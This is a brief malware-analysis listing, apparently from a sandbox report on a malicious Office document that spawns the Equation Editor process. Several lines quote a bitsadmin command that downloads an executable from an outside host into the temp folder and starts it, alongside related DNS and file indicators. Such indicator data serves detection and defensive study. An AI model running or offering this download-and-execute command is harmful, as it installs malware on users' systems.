Technical Information
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe && start %TEMP%\A.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{362eac86-fc97-4205-88ff-b01bc3a8613a}.tmp
- 'go###tula.com':443
- DNS ASK go###tula.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe && start %TEMP%\A.exe' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding